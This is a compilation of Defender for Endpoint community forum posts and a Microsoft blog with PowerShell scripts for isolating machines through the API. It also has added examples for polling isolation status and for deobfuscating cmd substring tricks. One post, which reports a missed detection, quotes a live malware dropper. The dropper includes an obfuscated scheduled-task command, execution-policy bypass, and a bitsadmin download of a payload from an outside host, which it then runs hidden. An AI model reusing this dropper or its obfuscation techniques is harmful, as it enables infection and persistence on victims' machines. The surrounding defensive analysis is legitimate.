How to Create a Custom Slack Alert for Windows Defender ATP using Microsoft Flow in 5 minutes
The MVP WDATP API Hackathon ended two hours ago and the first outcome is blogged. If you like the following blog, please credit the author with a "like" here in the tech community. https://azurementor.wordpress.com/2019/03/22/how-to-create-a-custom-slack-alert-for-windows-defender-advanced-threat-protection-atp-using-microsoft-flow-in-5-minutes/
[Solved] Dan Michelson, Mar 22, 2019, Microsoft. 7.1K views, 23 likes, 2 comments.

Automate response with Defender ATP and Microsoft Flow
Another cool product of the MVP Summit Hackathon, by Stefan Schörling. A step-by-step blog will guide you through automating responses with the MDATP Flow connector. Don't forget to show your love: use the like button here and share your feedback in this conversation. http://blog.sec-labs.com/2019/04/automate-response-with-defender-atp-and-microsoft-flow/
Dan Michelson, Apr 08, 2019, Microsoft. 3.5K views, 19 likes, 0 comments.

YARA rule support
Hi everybody, I'm curious whether Microsoft is planning to support YARA rules. I think that this will become even more important in the future. I found this very old thread from 2019, where this question was asked by other folks: IS MS looking to support custom YARA rules for Windows Defender ATP - Microsoft Tech Community. Unfortunately, it looks like nothing has happened so far. Best regards, Stefan
SteBeSec, Apr 17, 2021, Iron Contributor. 12K views, 14 likes, 1 comment.

[MDE] Add the important feature, Yara rules if possible
Hi, refer to this advisory (first link). In addition, you can see that there are Yara rules from GitHub (inside the pdf) (2nd link). All EDR/XDR companies (except Microsoft) already have features and a Yara rule configuration for incident responders to detect with. The method of adding and detecting with Yara rules has been in practice across companies for many years. Would you mind advising on any reason for not adding the important feature, Yara rules? It would be good if you included the important feature, Yara rules. If not, would you mind advising on converting from Yara rules to an MDE query for querying via advanced threat hunting? Thanks, much appreciated. 🙂
https://www.csa.gov.sg/singcert/Advisories/ad-2021-007
This link is the Yara rule: https://github.com/Neo23x0/signature-base/blob/master/yara/apt_cobaltstrike.yar
https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/yara-rule-support/m-p/2276820
tay76, Aug 25, 2021, Copper Contributor. 21K views, 11 likes, 7 comments.

MUST be able to delete duplicate/orphaned devices from M365 Security Center
Good morning, I am about 2-3 weeks into evaluating Microsoft Defender for Endpoint, and so far have about 4 Windows 10 devices onboarded and managed through Intune policies. One of the test machines was a fairly fresh build (1903) of Windows 10 when it was onboarded. As such it generated over 900+ vulnerabilities in TVM. However, during the course of the next day or two, as it got itself patched all the way to 20H2, it then for some reason generated a duplicate device in the M365 portal - with exactly the same Device AAD id - and currently both the "old" and "new" devices are showing as Active 5 days later.

So first of all, it's a nightmare that the duplicate device was created in the first place with the same Device AAD id - so what happens when one of my customers' networks gets upgraded with 500 Windows 10 devices from version X to 20H2 - are there going to be 500 duplicate devices created??? I read lots of articles yesterday about people seeing this issue as far back as 2018, where they just need to be able to lance out a given machine or machine(s) for whatever reason from the database to keep everything tidy. I spent hours looking for a solution. We have a 180 day retention period set. I'm not waiting 6 months for my database to clean itself up due to a bug in the platform, you've got to be kidding! Given that this has happened after onboarding only 4 devices, it's not leaving a good taste in my mouth. And how do I explain this to my customers????

The real problem, however, is the severe impact this has on the TVM reporting. As I mentioned, the machine patched itself without issue all the way to 20H2, so all 900+ vulnerabilities have been addressed - like literally *all* of them. However, when I look at any dashboard in Threat & Vulnerability Management the stats are all completely skewed because this device's statistics are still being accounted for.

Given the VALUE of the TVM data, which I think is BRILLIANT, having the CONTEXT skewed due to this duplicate device bug, but most importantly the lack of basic functionality to remove an orphaned machine to tidy things up, is completely unacceptable. As the administrator of my own estate (and my customers' estates) I should be able to have the final say, in terms of a judgement call, on what devices should be listed in the portal. Waiting for a device to be inactive for 6 months to have its clean-up routine run by the platform automatically isn't acceptable.

The offboarding script workaround I've been reading about isn't going to cut it either, so please don't suggest it. I tried it using the API explorer method and by running the local offboarding script on said machine yesterday. Neither method worked, as both devices are still showing in the portal 18 hours later. This method also doesn't account for machines that (for whatever reason) will not be able to contact the portal to check in and receive the offboarding command (lost device, test device, corrupt device, BYOD - the list goes on).

So...... Microsoft - please, please, please, please - can we get a Delete button in the device actions menu so that we can clean up our estate and keep our TVM figures accurate? Otherwise, what is the point of any of the statistics and recommendations displayed if you can't act on them / have already acted on them?? So when senior management ask, "What's our posture?", the answer would unfortunately still be, "Dunno." Thank you.
[Solved] James_Gillies, Apr 27, 2021, Brass Contributor. 34K views, 11 likes, 18 comments.

Automate Windows Defender ATP response action: Machine isolation
5 minutes, low complexity

Response teams rely on powerful actions that allow them to take immediate action when a threat is identified. Being able to automate those response actions is a powerful way to enhance a SecOps team's workflow. In this blog, we're going to demonstrate how you can automate the machine isolation response action.

In our previous blogs we've demonstrated how you can:
- Set up an app and create a script to get WDATP's alerts (Hello World blog). This is a good reference for when you need to create a new app.
- Grant more permissions, and get and update alerts as part of a ticketing/SIEM/SOAR integration (Ticketing System Integration blog). This is a good source of information to learn how to add more permissions to apps.

For response teams, a typical use case involves the ability to enrich SIEM or SOAR playbooks with Windows Defender ATP's powerful remediation capabilities. Just imagine how powerful it can be to detect malicious activity using your firewall or IPS and isolate the suspicious machine wherever it is (even if the machine is off the network at the time of response).

In this blog, we'll walk you through using the machine isolation API. This response action leaves the machine disconnected from any network connection other than the Windows Defender ATP channel (allowing Windows Defender ATP to undo the isolation). What's great about this demonstration is that it can be applied to the other response actions documented here.

Let's start

In this section, we'll walk you through the following:
Step 1: Add the required permission to your application
Step 2: Isolate a machine by machine ID or machine name

Step 1 - Add the required permission to the application:
If you haven't created an app: create an app using the instructions described in the Hello World blog, then follow the instructions on how to add the isolation permission as described below.
If you've already created an app that you're going to reuse for this demonstration: add the "Isolate machine" permission as described below.
We recommend that you follow the detailed steps described in "Step 1 - Add the required permission to the application" in the Alert Update API blog.

Add Isolation Permission
1. Open the Azure portal.
2. Navigate to Azure Active Directory > App registrations.
3. Under All Apps, find and select the application, for example ContosoSIEMConnector.
4. Navigate to Settings > Required permissions > Enable Access.
5. Select the checkbox for the Isolate machine application permission.
6. Click Save and Grant Permissions.
Done! You have successfully added the required permissions to the application.

Step 2 - Isolate a machine by machine ID or machine name:
Save the following script file as IsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

IsolateMachine.ps1
```powershell
param (
    [Parameter(Mandatory=$true)][string]$comment,                    # any comment that helps the analyst
    [Parameter(Mandatory=$true)][string]$machineIdOrComputerDnsName, # the machine ID or ComputerDnsName
    [Parameter(Mandatory=$true)]
    [ValidateSet('Full','Selective')]                                # only the two isolation types the API accepts
    [string]$isolationType                                           # the type of machine isolation
)

$token = ./Get-Token.ps1   # execute Get-Token.ps1 to get the authorization token

$url = "https://api.securitycenter.windows.com/api/machines/$machineIdOrComputerDnsName/Isolate"

$body = @{
    Comment       = $comment
    IsolationType = $isolationType
}

$headers = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $token"
}

$response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

# 201 Created means the isolation request was accepted and queued as a machine action.
if ($response.StatusCode -eq 201) {
    return $true    # isolation request accepted
} else {
    return $false   # isolation request failed
}
```
Example 1: Isolate by machine DNS name
Find the machine FQDN on the machine page (concatenate the machine name and the domain). For example, to isolate the machine testMachine.contoso.com use the following command:
```powershell
.\IsolateMachine.ps1 -machineIdOrComputerDnsName testMachine.contoso.com -comment "isolate because of alert" -isolationType Full
```

Example 2: Isolate by using machine ID
Find the machine ID in the URL of the machine page. For example, to isolate the machine whose machine page URL is https://securitycenter.windows.com/_machine/1f2258dc516c7bf8ec62466e2e876774c0a984f3 use the following command:
```powershell
.\IsolateMachine.ps1 -machineIdOrComputerDnsName 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "isolate because of alert" -isolationType Full
```

Example 3: Isolate machines with severe alerts
Read high severity alerts as described in the previous blogs, then use the machine ID found in each alert to isolate the machine using the following script.

GetSevereAlertsAndIsolate.ps1
```powershell
# Returns alerts created in the past hour and isolates the machines with high-severity alerts.
$token = .\Get-Token.ps1
$dateTime = (Get-Date).ToUniversalTime().AddHours(-1).ToString("o")

# Build the URL with an OData filter for creation time and severity
$url = "https://api.securitycenter.windows.com/api/alerts?`$filter=alertCreationTime ge $dateTime and severity eq 'High'"

$headers = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $token"
}

$alerts = Invoke-RestMethod -Method Get -Uri $url -Headers $headers -ErrorAction Stop

# For each alert, take the machineId and alertId and isolate the machine,
# recording the alert ID in the isolation comment.
foreach ($alert in $alerts.value) {
    $machineId = $alert.machineId
    $alertId   = $alert.id
    $url = "https://api.securitycenter.windows.com/api/machines/$machineId/Isolate"
    $body = @{
        Comment       = "Isolate machine because alert - $alertId"
        IsolationType = "Full"   # required by the Isolate API: 'Full' or 'Selective'
    }
    $response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

    # Check the isolation request status code and write to the log file
    if ($response.StatusCode -eq 201) {
        Add-Content c:\temp\api\log.txt "The isolation of machine $machineId ended successfully"
    } else {
        Add-Content c:\temp\api\log.txt "Failed to isolate machine $machineId"
    }
}
```

Example 4: Release machine (un-isolate)
Save the script below as UnIsolateMachine.ps1 in the same folder where you saved the Hello World example (where Get-Token.ps1 was saved).

UnIsolateMachine.ps1
```powershell
param (
    [Parameter(Mandatory=$true)][string]$comment,
    [Parameter(Mandatory=$true)][string]$machineId
)

$token = ./Get-Token.ps1

$url = "https://api.securitycenter.windows.com/api/machines/$machineId/UnIsolate"

$body = @{ Comment = $comment }

$headers = @{
    'Content-Type' = 'application/json'
    Accept         = 'application/json'
    Authorization  = "Bearer $token"
}

$response = Invoke-WebRequest -Method Post -Uri $url -Body ($body | ConvertTo-Json) -Headers $headers -ErrorAction Stop

# Return the machine action the API created for the release request
return ($response.Content | ConvertFrom-Json)
```

Use the script in the same way to release the machine from isolation:
```powershell
.\UnIsolateMachine.ps1 -machineId 1f2258dc516c7bf8ec62466e2e876774c0a984f3 -comment "un-isolate - machine was found clean"
```

Conclusion:
In this blog we demonstrated how you can easily automate Windows Defender ATP response actions. There are more actions you can automate, such as running an antivirus scan and restricting app execution. For more information, see the other actions here. Let us know if you are interested in more specific remediation examples. In the next blog we'll demonstrate the integration of alerts from other detection sources. Thanks!
@Haim Goldshtein, security software engineer, Windows Defender ATP
@Dan Michelson, program manager, Windows Defender ATP
Haim Goldshtein, Mar 07, 2019, Microsoft. 32K views, 8 likes, 5 comments.

WDATP alert/incident assignment
Hello, when I look at an alert on the console, I'm able to perform an action that assigns it to myself. I would also like to be able to assign it to others in my organization (we have a team of people who respond to WDATP alerts). Is there any option to do that?
Yury Kissin, Apr 15, 2019, Brass Contributor. 1.7K views, 7 likes, 4 comments.

False positive: Suspicious PowEmotet behavior was blocked
Based on social media posts, it seems quite a few of us are experiencing numerous false positive alerts related to 'PowEmotet'. While it's understandable that false positives happen, it's also somewhat amazing this one made it through QA. But this also highlights some things that I find extremely frustrating about Defender for Endpoint. There does not seem to be a reliable way to deal with these at a tenant level, aside from setting the status to "false positive" and potentially adding a file hash of a related executable to Indicators and hoping it goes away. Is there anything I'm missing here? Also, where is Microsoft acknowledging this issue? Where should I go for up-to-the-minute updates on occurrences like this?
GuyThreep, Dec 01, 2021, Copper Contributor. 6.6K views, 7 likes, 0 comments.

Malware not detected (but it should)
Some days ago a colleague received an email (O365 ATP protected) and clicked the link inside. The link caused a zip file to be downloaded. The zip contained 2 files, a shortcut and an xml file. The shortcut actually created a scheduled task:

```
%windir%\System32\schtasks.exe /F /Create /sc minute /MO 15 /TN "AI" /ST 05:43 /TR "cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c '&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'"
```

So a cmd was started and then a PowerShell command to parse the content of the zip file. The zip file contained the string below (to install the malware). Now the malware is correctly detected, but a week ago it wasn't; the reason for concern is that Defender ATP SHOULD have detected suspicious activity: a zip was downloaded; the lnk file, when double-clicked, created a task; the task launched a cmd; the cmd launched a PowerShell; and the PowerShell went through the file system to get the original zip and install the malware. I'm wondering why no suspicious activity was detected.

I also wonder why there is no way to interact with MSFT support in such a case if you don't have a support plan; the evidence is that I'm facing a product issue.

The string contained at the end of the zip file:

```powershell
$IPgHSp9NqFwlyUdz9EiUaC=$env:HOMEDRIVE+$env:HOMEPATH+'\AppData\Roaming';
start-process -wiNdowStylE HiDden schtasks '/change /tn AI /disable';
$1ky8EqL4xuTNcMdlzE160A0 = (Get-WmiObject Win32_ComputerSystemProduct).UUID;
$d9aSs4246nDe2406Bu0oGMC=$1ky8EqL4xuTNcMdlzE160A0.Substring(0,6);
$2mg4sgEtuOEmhIplOMZ3O34 = $IPgHSp9NqFwlyUdz9EiUaC+'\'+$d9aSs4246nDe2406Bu0oGMC;
If(test-path $2mg4sgEtuOEmhIplOMZ3O34"\_in"){$gZ6ZH3E1bBYDLsCi90GNDKJzl = (Get-Date).AddMinutes(-20);$gwbsm1Im8I4bn6mZ40KwC3GD=Get-ChildItem -Path $2mg4sgEtuOEmhIplOMZ3O34"\_in" | Where-Object {$_.LastWriteTime -gt $gZ6ZH3E1bBYDLsCi90GNDKJzl };if ($gwbsm1Im8I4bn6mZ40KwC3GD){exit;}};
New-Item -ItemType Directory -Force -Path $2mg4sgEtuOEmhIplOMZ3O34;
$rr="`$namKgJJlKuRmxyZh=""$2mg4sgEtuOEmhIplOMZ3O34\sbr_init.ps1"";`$clpsr='/C bitsadmin /transfer JuhtdQPu /download /priority FOREGROUND ""https://mrscremeansclassroom.com/kfldcncjfvdwer/sdcmgfkbfg"" ""'+`$namKgJJlKuRmxyZh+'""'; start-process -wiNdowStylE HiDden cmd.exe `$clpsr;`$e=1;while(`$e -eq 1){If(test-path `$namKgJJlKuRmxyZh){`$e=3;}Start-Sleep -s 3;};`$clpsr='/C powershell -win hidden -ep bypass -File '+`$namKgJJlKuRmxyZh;start-process -wiNdowStylE HiDden cmd.exe `$clpsr;";
$rr | out-file $2mg4sgEtuOEmhIplOMZ3O34'\KG1PNqifExGVCbhCkcxwnc.ps1';
$VEzW3fIGi5Wmyd12HPG46o=' /F /create /sc minute /mo 5 /TN "AppRunLog" /ST 03:30 /TR "powershell.exe -ep bypass -win 1 -file '+$2mg4sgEtuOEmhIplOMZ3O34+'\KG1PNqifExGVCbhCkcxwnc.ps1 "';
start-process -wiNdowStylE HiDden schtasks $VEzW3fIGi5Wmyd12HPG46o;
```
pbaratta, May 29, 2019, Brass Contributor. 4.9K views, 6 likes, 4 comments.

MS Defender - Installation Error version 101.25072 on macOS
Dear experts, the latest version of MS Defender can't be installed. I have been getting an error message since the release date (5th Aug). I have tried restarting the computer and tested with different networks; same issue 🙁
[Solved] Yassin Koleilat, Aug 29, 2025, Brass Contributor. 4.2K views, 6 likes, 22 comments.
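The isolation scripts in the "Automate Windows Defender ATP response action: Machine isolation" blog above treat HTTP 201 as success. The API answers 201 as soon as the isolation request has been queued as a machine action; the device is actually cut off only when that action reaches the Succeeded state, which you can observe by polling /api/machineactions/{id}. The following PowerShell function is an added example, not code from the blog or from Microsoft. It assumes the token comes from the blog's Get-Token.ps1, uses the same base URL and Isolate path as the blog, and takes an optional Invoker script block so the polling logic can be exercised offline against the constructed fake API at the end of the block.

```powershell
# Added example (not from the original blog): queue an isolation request and
# wait for the resulting machine action to finish instead of stopping at 201.
function Invoke-MdeIsolation {
    param(
        [Parameter(Mandatory)][string]$Token,
        [Parameter(Mandatory)][string]$MachineId,
        [Parameter(Mandatory)][string]$Comment,
        [ValidateSet('Full', 'Selective')][string]$IsolationType = 'Full',
        [string]$BaseUrl = 'https://api.securitycenter.windows.com/api',
        [int]$TimeoutSeconds = 300,
        [int]$PollSeconds = 10,
        # Pluggable HTTP call (assumption: returns Invoke-RestMethod's parsed JSON),
        # so the function can be tested without a tenant.
        [scriptblock]$Invoker = {
            param($Method, $Uri, $Headers, $Body)
            if ($Body) {
                Invoke-RestMethod -Method $Method -Uri $Uri -Headers $Headers -Body $Body -ErrorAction Stop
            } else {
                Invoke-RestMethod -Method $Method -Uri $Uri -Headers $Headers -ErrorAction Stop
            }
        }
    )
    $headers = @{
        'Content-Type' = 'application/json'
        Accept         = 'application/json'
        Authorization  = "Bearer $Token"
    }
    # IsolationType is required by the Isolate API.
    $body = @{ Comment = $Comment; IsolationType = $IsolationType } | ConvertTo-Json

    # The POST returns the machine action that was queued (id, type, status, ...).
    $action = & $Invoker 'Post' "$BaseUrl/machines/$MachineId/Isolate" $headers $body
    $deadline = (Get-Date).AddSeconds($TimeoutSeconds)

    # Pending and InProgress are the non-terminal statuses of a machine action;
    # keep polling until the API reports Succeeded, Failed, TimeOut or Cancelled.
    while ($action.status -in @('Pending', 'InProgress')) {
        if ((Get-Date) -gt $deadline) {
            return [pscustomobject]@{ ActionId = $action.id; Status = 'ClientTimeout'; Isolated = $false }
        }
        Start-Sleep -Seconds $PollSeconds
        $action = & $Invoker 'Get' "$BaseUrl/machineactions/$($action.id)" $headers $null
    }
    [pscustomobject]@{
        ActionId = $action.id
        Status   = $action.status
        Isolated = ($action.status -eq 'Succeeded')
    }
}

# Offline demonstration with a constructed fake API: the POST queues the action,
# the first poll still shows it running, the second reports success.
$script:fakeCalls = 0
$fakeApi = {
    param($Method, $Uri, $Headers, $Body)
    $script:fakeCalls++
    switch ($script:fakeCalls) {
        1       { [pscustomobject]@{ id = 'act-1'; type = 'Isolate'; status = 'Pending' } }
        2       { [pscustomobject]@{ id = 'act-1'; type = 'Isolate'; status = 'InProgress' } }
        default { [pscustomobject]@{ id = 'act-1'; type = 'Isolate'; status = 'Succeeded' } }
    }
}

Invoke-MdeIsolation -Token 'dummy-token' -MachineId '1f2258dc516c7bf8ec62466e2e876774c0a984f3' `
    -Comment 'isolate because of alert' -PollSeconds 0 -Invoker $fakeApi
```

Against a real tenant, drop the -Invoker argument and pass the output of Get-Token.ps1 as -Token; Invoke-RestMethod with -ErrorAction Stop throws on a 4xx/5xx answer, so a rejected request surfaces as a terminating error rather than as a false "Isolated = $false" result, and ClientTimeout means only that the action had not finished within TimeoutSeconds, not that it failed.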
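The scheduled-task command quoted in the "Malware not detected (but it should)" post above hides powershell and iex behind cmd.exe substring expansions of %OS% and %PUBLIC%, which is why a string match on "powershell" in the task's /TR value finds nothing. The following PowerShell function is an added example, not code from that post: it expands %VAR:~start,len% expressions against an environment map you supply, so the command can be read without executing it. The environment values in Show-ExpandedTaskCommand are assumed defaults for an English Windows 10 host, and the sample string is the /TR value copied from the post.

```powershell
# Added example (not from the original post): expand cmd.exe %VAR:~start,len%
# substrings offline against an explicit environment map.
function Expand-CmdSubstring {
    param(
        [Parameter(Mandatory)][string]$CommandLine,
        # Pass a @{} literal: PowerShell hashtable literals are case-insensitive,
        # which matches cmd.exe's treatment of variable names.
        [Parameter(Mandatory)][hashtable]$Environment
    )
    # cmd.exe forms: %VAR%, %VAR:~start% and %VAR:~start,len%.
    # A negative start counts from the end; a negative len stops that many characters before the end.
    $pattern = '%(?<name>[A-Za-z_][A-Za-z0-9_()]*)(?::~(?<start>-?\d+)(?:,(?<len>-?\d+))?)?%'
    $evaluator = {
        param($m)
        $name = $m.Groups['name'].Value
        # Unknown variables are left untouched, as cmd.exe leaves them.
        if (-not $Environment.ContainsKey($name)) { return $m.Value }
        $value = [string]$Environment[$name]
        if (-not $m.Groups['start'].Success) { return $value }
        $start = [int]$m.Groups['start'].Value
        if ($start -lt 0) { $start = [Math]::Max(0, $value.Length + $start) }
        if ($start -ge $value.Length) { return '' }
        if ($m.Groups['len'].Success) {
            $len = [int]$m.Groups['len'].Value
            if ($len -lt 0) { $len = $value.Length + $len - $start }
        } else {
            $len = $value.Length - $start
        }
        if ($len -le 0) { return '' }
        $len = [Math]::Min($len, $value.Length - $start)
        return $value.Substring($start, $len)
    }.GetNewClosure()
    [regex]::Replace($CommandLine, $pattern, $evaluator)
}

function Show-ExpandedTaskCommand {
    # Constructed sample: the /TR value of the scheduled task quoted in the post.
    $sample = 'cmd /c power%os:~6,1%hell -eP bypAss -win 1 -c ''&{cd %public:~-15,9%\;$k=dir -r -force -in riepi*.*|select -last 1;$k=cat -LiteralPath $k;%os:~1,1%ex $k[$k.length-1]}'''
    # Assumed default values on an English Windows 10 host.
    $win10 = @{
        OS         = 'Windows_NT'
        PUBLIC     = 'C:\Users\Public'
        SystemRoot = 'C:\Windows'
    }
    Expand-CmdSubstring -CommandLine $sample -Environment $win10
}

Show-ExpandedTaskCommand
```

With those values, power%os:~6,1%hell resolves to powershell (character 6 of Windows_NT is s), %os:~1,1%ex resolves to iex, and %public:~-15,9% resolves to C:\Users\ (the last 15 characters of C:\Users\Public, of which the first 9 are taken), so the recursive dir -r -force -in riepi*.* search starts under C:\Users. Feed the same map the real values from the victim host when they differ from the defaults, since the expansion depends entirely on them.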